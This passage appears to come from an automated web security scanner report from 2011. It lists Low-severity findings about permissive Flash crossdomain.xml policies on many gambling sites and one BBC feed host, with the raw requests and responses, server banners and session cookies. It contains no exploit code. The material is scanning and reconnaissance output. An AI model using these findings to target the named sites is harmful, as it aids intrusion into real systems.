Host: de.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5jyo2ey3yspzg2ap4zo1wl55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.51. http://de.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://de.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: de.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rwwxva554b3fkwmcpmdaxo55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.52. http://download.neogames-tech.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://download.neogames-tech.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: download.neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 1044
Content-Type: text/xml
Last-Modified: Wed, 02 Mar 2011 10:58:07 GMT
Accept-Ranges: bytes
ETag: "f67924b6c8d8cb1:d66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:37:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*.karamba.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.neogamespartners.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.dev.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.slotsandgames.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.qa.slotsandgames.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.netticasino.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.qa.netticasino.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.extraspel.com" secure="false"/>
...[SNIP]...

4.53. https://download.neogames-tech.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://download.neogames-tech.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: download.neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 1044
Content-Type: text/xml
Last-Modified: Wed, 02 Mar 2011 10:58:07 GMT
Accept-Ranges: bytes
ETag: "f67924b6c8d8cb1:b9f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:00:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*.karamba.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.neogamespartners.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.dev.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.slotsandgames.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.qa.slotsandgames.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.netticasino.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.qa.netticasino.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.extraspel.com" secure="false"/>
...[SNIP]...

4.54. http://el.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://el.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: el.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:34 GMT
Accept-Ranges: bytes
ETag: "9e74d2d847b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:40 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.55. http://el.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://el.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: el.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4bwq4n55k3pmm345mmyc3kjc; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.56. http://en.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://en.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: en.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w44eyu3feh3zfsna0zpz0a45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.57. http://en.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://en.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: en.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:43 GMT
Accept-Ranges: bytes
ETag: "a2051de47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:29 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.58. http://en.info.winnings.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://en.info.winnings.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: en.info.winnings.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4xy3rcjg2enutcfs23krou55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.59. http://en.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://en.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: en.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=se22kc55asucxo55we0oviaq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.60. http://en.scratch2cash.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://en.scratch2cash.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: en.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:25:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=guti0mfwqnkduvaxbopwkqn0; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.61. http://en.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://en.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: en.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=yhvr1e45ixxzeo55xxn05g45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.62. http://es.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://es.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: es.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:12:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mjg2wh45l44rno452uk5a0vo; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.63. http://es.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://es.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: es.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:51 GMT
Accept-Ranges: bytes
ETag: "e8d30e347b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:36 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.64. http://es.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://es.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: es.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=44m4vqrb0fff1w55su4oiu55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.65. http://es.scratch2cash.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://es.scratch2cash.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: es.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vipslcyytd5wslftzn5koxya; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.66. http://es.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://es.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: es.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=utsmx245ch0lcwrxtaahtpzs; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.67. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=118
Expires: Mon, 16 May 2011 12:47:26 GMT
Date: Mon, 16 May 2011 12:45:28 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.68. http://fi.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fi.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fi.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vyq25j55hrag32qnlea4syi0; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.69. http://fi.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fi.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fi.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:58 GMT
Accept-Ranges: bytes
ETag: "249f90e747b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:06 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.70. http://fi.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fi.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fi.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=agfvqq55044jd2553gvfit55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.71. http://fi.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fi.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fi.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nzqrd02e5iqvdbrkckueryyw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
